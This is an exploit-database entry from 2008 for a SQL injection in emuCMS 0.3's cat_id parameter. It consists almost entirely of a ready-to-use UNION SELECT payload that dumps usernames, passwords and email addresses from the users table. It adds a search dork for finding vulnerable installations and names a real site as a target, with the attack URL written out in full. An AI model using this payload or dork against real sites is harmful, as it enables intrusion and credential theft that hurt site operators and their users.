emuCMS 0.3 (cat_id) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : emuCMS 0.3 (cat_id) Remote SQL Injection Vulnerability
# Published : 2008-06-20
# Author : TurkishWarriorr
# Previous Title : JaxUltraBB <= 2.0 (LFI/XSS) Multiple Remote Vulnerabilities
# Next Title : PHPAuction (profile.php user_id) Remote SQL Injection Vulnerability

################################################## #######################
#
# AUTHOR : TurkishWarriorr
#
# HOME : http://www.1923turk.org
#
################################################## #######################
Dork : Powered by emuCMS

exploit : index.php?page=category&cat_id=-9999+union+all+select+1,concat(user,char(58),passw ,char(58),email),3,null,null,null,7,8,9,10,11,null +from+users--

Test Sites

http://www.emusoft.org/index.php?page=category&cat_id=-9999+union+all+select+1,concat(user,char(58),passw ,char(58),email),3,null,null,null,7,8,9,10,11,null +from+users--
################################################## ########################
www.1923turk.org 
turkish-warriorr@hotmail.com

# www.Syue.com [2008-06-20]